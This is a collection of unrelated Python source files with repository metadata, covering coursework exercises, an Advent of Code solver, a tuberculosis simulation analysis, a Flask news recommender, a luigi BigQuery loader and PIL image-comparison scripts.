"created_d2": "2020-09-30", # ...through September 2020 (adjust these dates as needed)
"geo": True, # Only get observations with geospatial coordinates
"geoprivacy": "open", # Only get observations with public coordinates (not obscured/private)
"page": "all", # Paginate through all response pages
}
results = get_observations(**search_params)["results"]
# Paginate through all search results (may take a long time for a large query)
# results = get_observations(**search_params)
# Convert and write to GPX file
observations_to_gpx(results)
# observations_to_tsp(results)
| true |
7e4d1ca914a02e3255b059cd728e1277dfb48c1b | Python | sigudd/Session2 | /Session2_Assignment2.py | UTF-8 | 2,300 | 4.40625 | 4 | [] | no_license | #!/usr/bin/env python
# coding: utf-8
# In[1]:
# The myReduceSum function works like reduce function for finding sum of all given values
import sys
sys.setrecursionlimit(100)
#this myReduce function finds the sum of all the numbers upto the given number. eg Number:3 gives 1+2+3=6 as result
def myReduceSum(n):
if n==1:
return 1
else:
return (n)+myReduceSum(n-1)
sumRange = 7
print(myReduceSum(sumRange-1))
# In[2]:
# The myReduceSum function works like reduce function for finding sum of all given values
from functools import reduce
lst =range(7)
reduce(lambda x,y: x+y,lst)
# In[18]:
# The myfilterList function works like filter function for given list of values, which returns all even values
def myFilterEvenList(rangeLimit):
evenList = []
for num in range(rangeLimit):
if num%2==0:
evenList.append(num)
return evenList
rangeLimit = 20
print(myFilterEvenList(rangeLimit))
# In[4]:
#2.Implement List comprehensions to produce the following lists. Write List comprehensions to produce the following Lists ['A', 'C', 'A', 'D', 'G', 'I', ’L’, ‘ D’] ['x', 'xx', 'xxx', 'xxxx', 'y', 'yy', 'yyy', 'yyyy', 'z', 'zz', 'zzz', 'zzzz'] ['x', 'y', 'z', 'xx', 'yy', 'zz', 'xxx', 'yyy', 'zzz', 'xxxx', 'yyyy', 'zzzz'] [[2], [3], [4], [3], [4], [5], [4], [5], [6]] [[2, 3, 4, 5], [3, 4, 5, 6], [4, 5, 6, 7], [5, 6, 7, 8]] [(1, 1), (2, 1), (3, 1), (1, 2), (2, 2), (3, 2), (1, 3), (2, 3), (3, 3)]
myLst = [letter for letter in 'ACADGILD']
print(myLst)
# In[5]:
myLst = [letter*i for letter in 'xyz' for i in list(range(1,5))]
print(myLst)
# In[6]:
myLst = [letter*i for i in list(range(1,5)) for letter in 'xyz']
print(myLst)
# In[7]:
myLst = [ list(range(x,x+y)) for x in range(2,6) for y in range(4,5) ]
print(myLst)
# In[8]:
myLst = [ (x,y) for x in range(1,4) for y in range(1,4) ]
print(myLst)
# In[9]:
#Implement a function longestWord() that takes a list of words and returns the longest one
def longestWord(lstOfWords):
maxLen = 0
maxWord = ''
for word in lstOfWords:
if len(word)>maxLen:
maxLen = len(word)
maxWord = word
return word
words = ['Hi','Hello','how','are','acadgild']
print('the longest word is: ', longestWord(words))
# In[ ]:
| true |
641150a73d7fdb269fefa617b1badf1d81715e03 | Python | tituvely/django_lectures | /django_lectures/tuples.py | UTF-8 | 292 | 4.09375 | 4 | [] | no_license | # Booleans
True
False
# Tuples -> immutable
t = (1,2,3)
print(t[0])
t = ('a', True, 123)
print(t)
# t[0] = 'New'
# Sets
x = set()
x.add(1)
x.add(2)
print(x)
x.add(0.4)
print(x)
x.add(1)
x.add(2)
print(x)
converted = set([1,1,1,1,1,2,3,3,4,2,23])
print(converted) | true |
ce26061dfcc6fef1c6683021672f24a0548d1fa1 | Python | ayberkydn/haxRL | /pyrl/HorizontalBorder.py | UTF-8 | 653 | 3.328125 | 3 | [] | no_license | from Border import Border
import pygame
class HorizontalBorder(Border):
def __init__(self, center_x, center_y, length, restitution, visible = True, ghost = False):
super().__init__(center_x, center_y, restitution, visible, ghost)
self.length = length
def draw(self):
if self.visible:
start_x = self.center.x - self.length / 2
start_y = self.center.y
end_x = self.center.x + self.length / 2
end_y = start_y
pygame.draw.lines(self.scene.screen, self.color, False, [(start_x, start_y), (end_x, end_y)], 3)
| true |
d8885fe2dee9c90dcf506e173ae8a3238239cb90 | Python | mexiscool/Advent-of-Code-2020 | /day 7 (55min)/solver2.py | UTF-8 | 503 | 2.796875 | 3 | [] | no_license | a = open('input.txt', 'r').readlines()
rules = {}
for i in a:
rule = {}
j = i.split('.\n')[0].split(' bags contain')
#if j[0] == 'shiny gold':
# continue
k = (j[1]).split(',')
for m in k:
n = m.split(' bag')[0]
if n[3:] != ' other':
rule[n[3:]] = int(n[1])
rules[j[0]] = rule
def deepsearch(key):
print('key: '+str(key))
sum = 1
for value in rules[key]:
print(value)
sum += deepsearch(value)*rules[key][value]
return sum
print(deepsearch('shiny gold') - 1) | true |
44bf262887c514ab4c9ae447e6f131d7315bd518 | Python | zhangfang615/Tuberculosis | /simulation/TB_statistics.py | UTF-8 | 14,084 | 2.515625 | 3 | [
"Apache-2.0"
] | permissive | from __future__ import division
__author__ = 'Fang'
__date__= '2016.9.16'
__email__= 'fza34@sfu.ca'
__function__ = 'Tuberculosis simulation statistics'
import os
import random
import ast
import pandas
class patient:
def _init_(self):
self.removal = False
self.resistant = False
self.eventlist = []
self.mutation = {}
self.resistant_mutation = set()
def load_positions(position_path):
position_file=file(position_path)
position_list=[]
position=position_file.readline().strip()
while position:
position_list.append(position)
position = position_file.readline().strip()
position_file.close()
return position_list
def load_resistant_SNPs(resi_path, SNP_positions,TB_sequence):
resitant_SNPs_file=file(resi_path)
line = resitant_SNPs_file.readline().strip()
resistant_SNPs = {}
while line:
if line.startswith("Mycobacterium"):
fields=line.split("\t")
position=int(SNP_positions.index(fields[1]))
mutation=TB_sequence[position]+" "+fields[4].upper()
if position in resistant_SNPs.keys():
resistant_SNPs[position] = resistant_SNPs[position]+","+mutation
else:
resistant_SNPs[position] = mutation
line = resitant_SNPs_file.readline().strip()
resitant_SNPs_file.close()
return resistant_SNPs
def eventlist_str2list(eventlist_string):
eventlist = []
events = eventlist_string.split("\t")
for event in events:
eventlist.append(event)
return eventlist
def mutation_str2dic(mutation_string):
mutation_string = mutation_string[11:]
return ast.literal_eval(mutation_string)
def resistant_mutation_str2set(resistant_mutation_string):
resistant_mutation_string = resistant_mutation_string[20:]
# resistant_mutation_string= "set([2352, 1094, 1066, 3659, 3632, 3708])"
return eval(resistant_mutation_string)
def resistant_str2bool(resistant_string):
resistant_string = resistant_string.split(' ')[1]
if resistant_string == "True":
return True
else:
return False
def removal_str2bool(removal_string):
removal_string = removal_string.split(' ')[1]
if removal_string == "True":
return True
else:
return False
def reconstruct_patients_list(patients, simulation_file):
text = simulation_file.readlines()
for i in range(1024):
pat = patient()
patient_text=text[7+7*i:14+7*i]
pat.eventlist = eventlist_str2list(patient_text[1].strip())
pat.mutation = mutation_str2dic(patient_text[2].strip())
pat.resistant_mutation = resistant_mutation_str2set(patient_text[3].strip())
pat.resistant = resistant_str2bool(patient_text[4].strip())
pat.removal = removal_str2bool(patient_text[5].strip())
patients.append(pat)
return patients
def patients_sampling(unremoved, kappa):
sample_number=int(kappa*len(unremoved))
patients_sampling = random.sample(unremoved, sample_number)
return patients_sampling
def if_SNP_resistant(mutate_position, TB_sequence, nucleotide_muatated, resistant_SNPs):
nucleotide=TB_sequence[mutate_position]
SNPs = resistant_SNPs[mutate_position].split(",")
for SNP in SNPs:
mutation_pair = SNP.split(" ")
if nucleotide == mutation_pair[0] and nucleotide_muatated == mutation_pair[1]:
return True
return False
def if_mutate_resistant(mutate_position, TB_sequence, nucleotide_muatated, resistant_SNPs):
if not mutate_position in resistant_SNPs:
return False
elif not if_SNP_resistant(mutate_position, TB_sequence, nucleotide_muatated, resistant_SNPs):
return False
return True
def get_resistant_eventlist(patients,n, resistant_SNPs):
resistant_eventlist = []
patient = patients[n]
while patient.eventlist:
event = patient.eventlist[-1].split(" ")
if event[0] == '4':
patient.removal = False
patient.eventlist.pop()
elif event[0] == '2':
if event[1] == str(n):
patient.eventlist.pop()
else:
patient.mutation.clear()
mutations = event[3].split(";")
mutations = mutations[0:len(mutations) - 1]
for mutation in mutations:
fields = mutation.split(":")
patient.mutation[int(fields[0])] = fields[1]
patient.resistant_mutation.clear()
res = patient.resistant # record resistant
patient.resistant = False
for mutate_position in patient.mutation.keys():
nucleotide_muatated = list(patient.mutation[mutate_position])[1]
if if_mutate_resistant(mutate_position, TB_sequence, nucleotide_muatated, resistant_SNPs):
patient.resistant_mutation.add(mutate_position)
patient.resistant = True
if res == True and patient.resistant ==False:
resistant_eventlist.append('2')
patient.eventlist.pop()
elif event[0] == '1':
SNP = list(patient.mutation[int(event[1])])
if event[2] == SNP[0] and event[3] == SNP[1]:
patient.mutation.pop(int(event[1]))
patient.eventlist.pop()
else:
print "Bug!"
break
else:
SNP = list(patient.mutation[int(event[1])])
if event[3] == SNP[1]:
if event[2] == SNP[0]:
patient.mutation.pop(int(event[1]))
else:
SNP[1] = event[2]
patient.mutation[int(event[1])] = "".join(SNP)
try:
patient.resistant_mutation.remove(int(event[1]))
except Exception, e:
# print patient.eventlist[-1]
# print event[1]+event[2]+event[3]
print Exception, ":", e
# print if_mutate_resistant(int(event[1]), TB_sequence, event[3], resistant_SNPs)
# print resistant_SNPs[int(event[1])]
resistant_eventlist.append('3')
if not patient.resistant_mutation:
patient.resistant = False
patient.eventlist.pop()
else:
print "Bug!"
break
if patient.mutation or patient.removal or patient.resistant:
" failed traced back!"
return resistant_eventlist
if __name__ == '__main__':
statistic_output = file("E:/PYTHON_PROJECTS/TB_simulation/statistics_new", 'w')
t_list = [10, 20, 30, 40, 50] # time span 10, 15, 20, 25, 30, 35, 40, 45, 50
beta_list = [0.02, 0.025, 0.03, 0.035, 0.04] # contact/reinfection rate 0.001,0.01,0.05,0.1,0.15,0.2,0.25,0.3,0.35,0.4
P_resi_list = [0.0005, 0.0008, 0.001, 0.0015, 0.002] # rate of breakdown 0.05, 0.1, 0.15, 0.2, 0.3, 0.4, 0.5
# Pt=0.2 # probability of seeking treatment 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8
# Pr=0.3 # probability of resistant 0.01,0.05, 0.1, 0.15, 0.2, 0.3, .0.4, 0.5, 0.6, 0.7, 1
gama_list = [0.0005, 0.001, 0.005, 0.01, 0.02] # rate of removal 0.01, 0.05, 0.1, 0.2, 0.3
for t in t_list:
for beta in beta_list:
for P_resi in P_resi_list:
for gama in gama_list:
ancestor = file("E:/PYTHON_PROJECTS/TB_simulation/ancestor.fasta")
TB_sequence = ancestor.readline().strip()
ancestor.close()
SNP_positions = load_positions("E:/PYTHON_PROJECTS/TB_simulation/mutate_SNPs.txt")
resistant_SNPs = load_resistant_SNPs("E:/PYTHON_PROJECTS/TB_simulation/resi.vcf", SNP_positions,TB_sequence)
kappa = 0.1
patients = []
filename = "simulation_0.26_"+str(t)+"_"+str(beta)+"_"+str(P_resi)+"_"+str(gama)+".txt"
simulation_file = file("E:/PYTHON_PROJECTS/TB_simulation/output/" + filename)
reconstruct_patients_list(patients, simulation_file)
unremoved = set()
for i in range(0, len(patients)):
if not patients[i].removal:
unremoved.add(i)
count_sampling = []
count_resistant = []
count_unresistant = []
count_resistant_trans = []
count_resistant_acq = []
count_resistant_mevent = []
count_unresistant_oncere = []
for i in range(0, 20):
count_resistant.append(0)
count_unresistant.append(0)
count_resistant_trans.append(0)
count_resistant_acq.append(0)
count_resistant_mevent.append(0)
count_unresistant_oncere.append(0)
seed = random.randint(0, 100000)
random.Random(seed)
sampling_patients = patients_sampling(unremoved, kappa)
count_sampling.append(len(sampling_patients))
sampling_patients.sort()
resistant_sample = set()
unresistant_sample = set()
for sample in sampling_patients: # count resistant samples and separate resistant and unresistant samples
if patients[sample].resistant:
count_resistant[i] += 1
resistant_sample.add(sample)
else:
unresistant_sample.add(sample)
for sample in resistant_sample:
resistant_eventlist = get_resistant_eventlist(patients, sample, resistant_SNPs)
if resistant_eventlist[0] == '2':
count_resistant_trans[i] += 1
else:
count_resistant_acq[i] += 1
if len(resistant_eventlist) > 1:
count_resistant_mevent[i] += 1
for sample in unresistant_sample:
count_unresistant[i] += 1
resistant_eventlist = get_resistant_eventlist(patients, sample, resistant_SNPs)
if len(resistant_eventlist) > 0:
count_unresistant_oncere[i] += 1
count_sampling_pd = pandas.Series(count_sampling)
count_resistant_pd = pandas.Series(count_resistant)
count_unresistant_pd = pandas.Series(count_unresistant)
count_resistant_trans_pd = pandas.Series(count_resistant_trans)
count_resistant_acq_pd = pandas.Series(count_resistant_acq)
count_resistant_mevent_pd = pandas.Series(count_resistant_mevent)
count_unresistant_oncere_pd = pandas.Series(count_unresistant_oncere)
count_sampling_mean = count_sampling_pd.mean()
count_resistant_mean = count_resistant_pd.mean()
count_resistant_std = count_resistant_pd.std()
resistant_ratio = count_resistant_mean / count_sampling_mean *100
count_resistant_trans_mean = count_resistant_trans_pd.mean()
count_resistant_trans_std = count_resistant_trans_pd.std()
resistant_trans_ratio = count_resistant_trans_mean / count_sampling_mean *100
count_resistant_acq_mean = count_resistant_acq_pd.mean()
count_resistant_acq_std = count_resistant_acq_pd.std()
resistant_acq_ratio = count_resistant_acq_mean / count_sampling_mean *100
count_resistant_mevent_mean = count_resistant_mevent_pd.mean()
count_resistant_mevent_std = count_resistant_mevent_pd.std()
if not count_resistant_mean == 0:
resistant_mevent_ratio = count_resistant_mevent_mean / count_resistant_mean *100
else:
resistant_mevent_ratio = 0
count_unresistant_mean = count_unresistant_pd.mean()
count_unresistant_oncere_mean = count_unresistant_oncere_pd.mean()
count_unresistant_oncere_std = count_unresistant_oncere_pd.std()
output_line = str(t) + " " + str(beta) + " " + str(P_resi) + " " + str(gama) \
+ "\t" + str(count_sampling_mean) \
+ "\t" + str(count_resistant_mean) + "\t" + str(count_resistant_std) + "\t" + str(resistant_ratio) \
+ "\t" + str(count_resistant_trans_mean) + "\t" + str(count_resistant_trans_std) + "\t" + str(resistant_trans_ratio) \
+ "\t" + str(count_resistant_acq_mean) + "\t" + str(count_resistant_acq_std) + "\t" + str(resistant_acq_ratio) \
+ "\t" + str(count_resistant_mevent_mean) + "\t" + str(count_resistant_mevent_std) + "\t" + str(resistant_mevent_ratio) \
+ "\t" + str(count_unresistant_mean) \
+ "\t" + str(count_unresistant_oncere_mean) + "\t" + str(count_unresistant_oncere_std)+"\n"
statistic_output.writelines(output_line)
statistic_output.close() | true |
7d2ddc300251629f2e243a3c6b8041fb588a3eaf | Python | Ronypea/Feed-personalization | /news.py | UTF-8 | 7,822 | 2.703125 | 3 | [] | no_license | import nltk
import pickle
from nltk.stem.lancaster import LancasterStemmer
from nltk.corpus import stopwords
import requests
from bs4 import BeautifulSoup
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, Integer
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from bottle import route, run, template, request
from bottle import redirect
import math
from math import log
Base = declarative_base()
class News(Base):
__tablename__ = "news"
id = Column(Integer, primary_key = True)
title = Column(String)
author = Column(String)
url = Column(String)
comments = Column(Integer)
points = Column(Integer)
label = Column(String)
class Words(Base):
__tablename__ = "words"
word = Column(String, primary_key = True)
never_word = Column(Integer)
maybe_word = Column(Integer)
good_word = Column(Integer)
def get_news(network_page):
news_page = BeautifulSoup(network_page.text, 'html5lib')
news = []
for info in zip(news_page.table.find_all('tr', class_='athing'),news_page.table.find_all('td', class_='subtext')):
title = info[0].find('a', class_="storylink").text
try:
url = info[0].find('span', class_="sitestr").text
except:
url = 'None'
try:
author = info[1].find('a', class_="hnuser").text
points = (info[1].find('span', class_="score").text)
comments = (info[1].find_all('a')[-1].text)[:-9]
except:
author = 'None'
points = '0'
comments = '0'
part = dict(author=author, comments=comments, points=points, title=title, url=url)
news.append(part)
return news
page = requests.get('https://news.ycombinator.com/')
news_list = get_news(page)
engine = create_engine("sqlite:///news.db")
Base.metadata.create_all(bind=engine)
session = sessionmaker(bind=engine)
s = session()
def add_words(new_word, label):
never_word, maybe_word, good_word = 0, 0, 0
if label == 'never':
never_word = 1
elif label == 'maybe':
maybe_word = 1
else:
good_word = 1
word = s.query(Words).filter_by(word=new_word).first()
if type(word) == type(None):
record = Words(word=new_word,
never_word=never_word,
maybe_word=maybe_word,
good_word=good_word)
s.add(record)
else:
word.never_word += never_word
word.maybe_word += maybe_word
word.good_word += good_word
s.commit()
return
stop = set(stopwords.words('english'))
st = LancasterStemmer()
'''
all_news = s.query(News).filter(News.label != None).all()
for news in all_news:
label = news.label
title = news.title
for symbol in '.;:-?!()':
title = title.replace(symbol, ' ')
title_split = title.split()
for word in title_split:
if word in stop:
pass
else:
word = st.stem(word)
word = word.strip().lower()
add_words(word, label) '''
def add_news(news):
for one_news in news:
news = News(title=one_news['title'],
author=one_news['author'],
url=one_news['url'],
comments=one_news['comments'],
points=one_news['points'])
s.add(news)
s.commit()
return
def next_page(network_page):
page = BeautifulSoup(network_page.text, 'html5lib')
morelink = page.find('a', attrs={'class':'morelink'})
link = morelink['href']
result = requests.get('{dom}/{url}'.format(dom = "https://news.ycombinator.com", url = link))
return result
def counted():
count_words_in_lab = [0, 0, 0]
words = s.query(Words).all()
for word in words:
count_words_in_lab[0] += int(word.never_word)
count_words_in_lab[1] += int(word.maybe_word)
count_words_in_lab[2] += int(word.good_word)
news = s.query(News).filter(News.label != None). all()
labels_prob = [0,0,0]
for one_news in news:
if one_news.label == 'never':
labels_prob[0] += 1
elif one_news.label == 'maybe':
labels_prob[1] += 1
else:
labels_prob[2] += 1
labels_prob[0] = labels_prob[0]/len(news)
labels_prob[1] = labels_prob[1]/len(news)
labels_prob[2] = labels_prob[2]/len(news)
return count_words_in_lab, labels_prob
def get_label(words, count_words_in_lab, labels_prob):
result = [0, 0, 0]
for one_word in words:
if one_word in stop:
pass
else:
one_word = st.stem(one_word)
record = s.query(Words).filter(Words.word == one_word).first()
if type(record) != type(None):
try:
result[0] += log(int(record.never_word) / count_words_in_lab[0])
except:
pass
try:
result[1] += log(int(record.maybe_word) / count_words_in_lab[1])
except:
pass
try:
result[2] += log(int(record.good_word) / count_words_in_lab[2])
except:
pass
result[0] += log(labels_prob[0])
result[1] += log(labels_prob[1])
result[2] += log(labels_prob[2])
if result[1] == max(result):
return 'maybe'
if result[0] == max(result):
return 'never'
if result[2] == max(result):
return 'good'
@route('/')
@route('/news')
def news_list():
count_words_in_lab, labels_prob = counted()
news = s.query(News).filter(News.label == None).all()
rows = []
for one_news in news:
title = one_news.title
for symbol in '.;:-?!()':
title = title.replace(symbol, ' ')
title = title.split()
label = get_label(title, count_words_in_lab, labels_prob)
if label == 'never':
color = '#999999'
elif label == 'maybe':
color = '#033cccc'
else:
color = '#ffffcc'
rows.append((label, color, one_news))
rows.sort(key=lambda i: i[0])
return template('recommended_template', rows=rows)
'''
@route('/')
@route('/news')
def news_list():
rows = s.query(News).filter(News.label == None).all()
return template('news_template', rows=rows)
'''
'''
@route('/add_label/', method='GET')
def add_label():
label = request.GET.get('label').strip() # 1. Получить значения параметров label и id из GET-запроса
idd = request.GET.get('id').strip()
s = session()
record = s.query(News).filter(News.id == idd) # 2. Получить запись из БД с соответствующим id (такая запись только одна!)
rec = record[0]
rec.label = label # 3. Изменить значение метки записи на значение label
s.commit() # 4. Сохранить результат в БД
redirect('/news') '''
@route('/update_news')
def update_news():
page = requests.get("https://news.ycombinator.com/newest") # 1. Получить данные с новостного сайта
news_list = get_news(page)
s = session()
for one_news in news_list: # 2. Проверить каких новостей еще нет в БД
rows = s.query(News).filter(News.author == one_news['author']).filter(News.title == one_news['title']).all()
if rows == []: # 3. Сохранить в БД те новости, которых там нет
news = News(**one_news)
s.add(news)
s.commit()
redirect('/news')
run(host='localhost', port=8080)
| true |
a4cacf11c88df17b2df017e921f437de5d521671 | Python | flegrisgreen/Heliostats_dashboard | /appFuncs/forms.py | UTF-8 | 1,921 | 2.515625 | 3 | [] | no_license | from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, TextAreaField, BooleanField, SelectField
from wtforms.validators import DataRequired, Length, Email, ValidationError, EqualTo
from appFuncs.models import Admin
from appFuncs import sql, con
class login_form(FlaskForm):
email = StringField('Email', validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
remember = BooleanField('Remember Me')
submit = SubmitField('Login')
class registration_form(FlaskForm):
username = StringField('Username', validators=[DataRequired(), Length(min=2, max=20)])
email = StringField('Email', validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('Confirm Password', validators=[DataRequired(), EqualTo('password')])
submit = SubmitField('Sign Up')
# These functions are custom validator functions that check that the username and email are unique
def validate_username(self, username):
user = Admin.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username is not unique, please choose a different one')
def validate_email(self, email):
user = Admin.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email is not unique, please choose a different one')
def list_choices():
choices = []
helio_list = sql.selectall(con=con, tname='helio_list', cols='helio_id', pattern='order by helio_id asc')
for helio in helio_list:
choice = (helio, helio)
choices.append(choice)
return choices
class heliostat_select(FlaskForm):
choices = list_choices()
heliostat = SelectField('Select a heliostat', choices=choices)
submit = SubmitField('Plot heliostat data') | true |
f00eec3c767039d797eb1ddd1e61b7933d8c56ed | Python | KirinNg/Cluster_knn | /LiSanProject/creatDir.py | UTF-8 | 965 | 2.5625 | 3 | [] | no_license | import numpy as np
import os
DIR = []
def dirlist(path, allfile):
filelist = os.listdir(path)
for filename in filelist:
filepath = os.path.join(path, filename)
if os.path.isdir(filepath):
dirlist(filepath, allfile)
else:
allfile.append(filepath)
return allfile
list1 = dirlist("20news-part1", [])
list2 = dirlist("20news-part2", [])
#np.save("LIST_1.npy",np.array(list1))
#np.save("LIST_2.npy",np.array(list2))
t = '%/\#$&|{}~'
for i in range(len(list1)):
all_text = open(list1[i]).read()
for k in t:
all_text = all_text.replace(k,' ')
all_text = all_text.split(" ")
DIR = DIR + all_text
for i in range(len(list2)):
all_text = open(list2[i]).read()
for k in t:
all_text = all_text.replace(k,'')
all_text = all_text.split(" ")
DIR = DIR + all_text
print(len(DIR))
DIR = list(set(DIR))
del DIR[0]
print(len(DIR))
#np.save("DIR.npy",np.array(DIR))
| true |
4adda659c32409ee51de9394f489d09d59797852 | Python | edx/luigi | /luigi/contrib/bigquery_avro.py | UTF-8 | 3,959 | 2.6875 | 3 | [
"Apache-2.0"
] | permissive | """Specialized tasks for handling Avro data in BigQuery from GCS.
"""
import logging
from luigi.contrib.bigquery import BigQueryLoadTask, SourceFormat
from luigi.contrib.gcs import GCSClient
from luigi.task import flatten
logger = logging.getLogger('luigi-interface')
try:
import avro
import avro.datafile
except ImportError:
logger.warning('bigquery_avro module imported, but avro is not installed. Any '
'BigQueryLoadAvro task will fail to propagate schema documentation')
class BigQueryLoadAvro(BigQueryLoadTask):
"""A helper for loading specifically Avro data into BigQuery from GCS.
Copies table level description from Avro schema doc, BigQuery internally will copy field-level descriptions
to the table.
Suitable for use via subclassing: override requires() to return Task(s) that output
to GCS Targets; their paths are expected to be URIs of .avro files or URI prefixes
(GCS "directories") containing one or many .avro files.
Override output() to return a BigQueryTarget representing the destination table.
"""
source_format = SourceFormat.AVRO
def _avro_uri(self, target):
path_or_uri = target.uri if hasattr(target, 'uri') else target.path
return path_or_uri if path_or_uri.endswith('.avro') else path_or_uri.rstrip('/') + '/*.avro'
def source_uris(self):
return [self._avro_uri(x) for x in flatten(self.input())]
def _get_input_schema(self):
"""Arbitrarily picks an object in input and reads the Avro schema from it."""
assert avro, 'avro module required'
input_target = flatten(self.input())[0]
input_fs = input_target.fs if hasattr(input_target, 'fs') else GCSClient()
input_uri = self.source_uris()[0]
if '*' in input_uri:
file_uris = list(input_fs.list_wildcard(input_uri))
if file_uris:
input_uri = file_uris[0]
else:
raise RuntimeError('No match for ' + input_uri)
schema = []
exception_reading_schema = []
def read_schema(fp):
# fp contains the file part downloaded thus far. We rely on that the DataFileReader
# initializes itself fine as soon as the file header with schema is downloaded, without
# requiring the remainder of the file...
try:
reader = avro.datafile.DataFileReader(fp, avro.io.DatumReader())
schema[:] = [reader.datum_reader.writers_schema]
except Exception as e:
# Save but assume benign unless schema reading ultimately fails. The benign
# exception in case of insufficiently big downloaded file part seems to be:
# TypeError('ord() expected a character, but string of length 0 found',).
exception_reading_schema[:] = [e]
return False
return True
input_fs.download(input_uri, 64 * 1024, read_schema).close()
if not schema:
raise exception_reading_schema[0]
return schema[0]
def _set_output_doc(self, avro_schema):
bq_client = self.output().client.client
table = self.output().table
patch = {
'description': avro_schema.doc,
}
bq_client.tables().patch(projectId=table.project_id,
datasetId=table.dataset_id,
tableId=table.table_id,
body=patch).execute()
def run(self):
super(BigQueryLoadAvro, self).run()
# We propagate documentation in one fire-and-forget attempt; the output table is
# left to exist without documentation if this step raises an exception.
try:
self._set_output_doc(self._get_input_schema())
except Exception as e:
logger.warning('Could not propagate Avro doc to BigQuery table description: %r', e)
| true |
26f6c385fdc468184c56f11cc829aba6b9b19836 | Python | rahulpokharna/AutoCamera | /imgManip.py | UTF-8 | 8,536 | 3.375 | 3 | [] | no_license | from PIL import Image
import time
# Timer decorator
def timeit(f):
def helper(*args, **kwargs):
start = time.time()
to_return = f(*args, **kwargs)
print('{} seconds'.format(time.time() - start))
return to_return
return helper
loadpath = '/images/'
savepath = '/output/'
# Function to compare and get the image with the brightest or darkest pixels out of the input values
@timeit
def pixelComp(file1="pic1.JPG", file2="pic2.JPG", bright=True, filename="output.JPG"):
try:
# Open images into program
img1 = Image.open(file1)
img2 = Image.open(file2)
# Get pixels from images
im1 = img1.load()
im2 = img2.load()
width, height = img1.size
# Initialize final image
finalImg = Image.new('RGB', (width, height))
finalPixels = finalImg.load()
# Iterate and compare to find brightest or darkest pixel
for i in range(width):
for j in range(height):
# Convert RGB to luminosity measurement
lum1 = calcLum(im1[i, j])
lum2 = calcLum(im2[i, j])
# Compare brightness of pixels
# Changed from direct comparison of pixels
# Compare, want to be true if brighter when night, darker when day etc
if (lum1 > lum2) == bright:
finalPixels[i, j] = im1[i, j]
else:
finalPixels[i, j] = im2[i, j]
finalImg.save(filename) # show()
print("completed: ", filename)
except IOError:
print("It broke")
raise(IOError)
# Function to compare and get the brightest or darkest image of the two
def imageComp(file1="pic1.JPG", file2="pic2.JPG", bright=True, filename="output.JPG"):
try:
# Open images into program
img1 = Image.open(file1)
img2 = Image.open(file2)
# Get pixels from images
im1 = img1.load()
im2 = img2.load()
width, height = img1.size
# Initialize luminosity sum for overall brightness
lum1 = 0
lum2 = 0
# Iterate and compare to find brightest or darkest pixel
for i in range(width):
for j in range(height):
# Convert RGB to perceived luminosity measurement
lum1 += calcLum(im1[i, j])
lum2 += calcLum(im2[i, j])
# See which image has the greatest total luminosity
if (lum1 > lum2) == bright:
img1.save(filename) # show()
else:
img2.save(filename)
print("completed")
except IOError:
print("It broke")
pass
# Def color shift prototype to see the dealio
@timeit
def colorShift(file="pic1.jpg", shift=5):
# image shift add pixel
# iterate thru image and set value of pixel xyz to xyz+5 for r, and mins for b
# Function to get the image with the greatest variety/range of colors
# Maybe use numpy for the image manipulations instead? Might be moer efficient for the shifting, much faster as well
try:
# Open images into program
img = Image.open("Image\\" + file)
print("Loaded image")
# Get pixels from images
im = img.load()
width, height = img.size
print("Height: ", height, "\nWidth: ", width)
# Output image
finalImg = Image.new('RGB', (width, height))
finalPixels = finalImg.load()
print(type(im))
for i in range(width):
# Increment K here, or after the below loop
for j in range(height):
# Store the R values here, as
# values[k][j], _, _= im[i,j]
# Then store the final pixels as however
# Convert the pixels into smaller gaps, so close colors are
# not double counted, to try to get a larger difference in color
# r1, g1, b1 = (im[i, j])
r, g, b = (im[i, j])
r2, g2, b2 = finalPixels[i, j]
# Shift along the width
iShiftPlus = min((i+shift) % width, i+shift)
iShiftMinus = max((i-shift) % width, i-shift)
# This is done incorrectly, we need to access the old data from each new place we place it, the current data in the final image and all other data
# So we don't override it, but this effect is cool.
# Assign New Photo image
finalPixels[i, j] = r2, b, g2
finalPixels[iShiftPlus, j] = r2, b2, g
finalPixels[iShiftMinus, j] = r, b2, g2
finalImg.save("Output\\output_" + str(shift) + file)
# finalImg.save("output.jpg")
except IOError:
print("It broke")
pass
# Function to get the image with the greatest variety/range of colors
def colorComp(file1="pic1.JPG", file2="pic2.jpg", filename="output.jpg"):
# Initialize the RGB list for large sizes of lists
# rgbRange = [[[0 for i in range(32)], [0 for j in range(32)], [0 for k in range(32)]] for x in range(2)]
# Create two lists to store the range of pixels with flags of 1 being present, 0 else
# Done incorrectly, aslso make it groups of 16, and nested
rgbRange1 = [[[0 for i in range(16)] for j in range(16)] for k in range(16)]
rgbRange2 = [[[0 for i in range(16)] for j in range(16)] for k in range(16)] # [[0 for i in range(32)], [0 for j in range(32)], [0 for k in range(32)]]
try:
# Open images into program
img1 = Image.open(file1)
img2 = Image.open(file2)
# Get pixels from images
im1 = img1.load()
im2 = img2.load()
width, height = img1.size
for i in range(width):
for j in range(height):
# Convert the pixels into smaller gaps, so close colors are
# not double counted, to try to get a larger difference in color
r1, g1, b1 = (im1[i, j])
r1 = r1 // 16
b1 = b1 // 16
g1 = g1 // 16
r2, g2, b2 = (im2[i, j])
r2 = r2 // 16
b2 = b2 // 16
g2 = g2 // 16
rgbRange1[r1][g1][b1] = 1
rgbRange2[r2][g2][b2] = 1
# Iterate through the rgb list to see which has a larger number
rgbSum1 = 0
rgbSum2 = 0
for i in range(16):
for j in range(16):
for k in range(16):
rgbSum1 += rgbRange1[i][j][k]
rgbSum2 += rgbRange2[i][j][k]
if rgbSum1 > rgbSum2:
img1.save(filename)
else:
img2.save(filename)
print("completed")
except IOError:
print("It broke")
pass
# Function to calculate luminosity based upon human sight perception
def calcLum(color):
red, green, blue = color
return ((red * 0.2126 + green * 0.7152 + blue * 0.0722) / 255)
if __name__ == '__main__':
# pixelComp(file1="Image\\brightest\\DSC_0454.JPG",
# file2="Image\\brightest\\DSC_0455.JPG", bright=False, filename="darkest1.JPG")
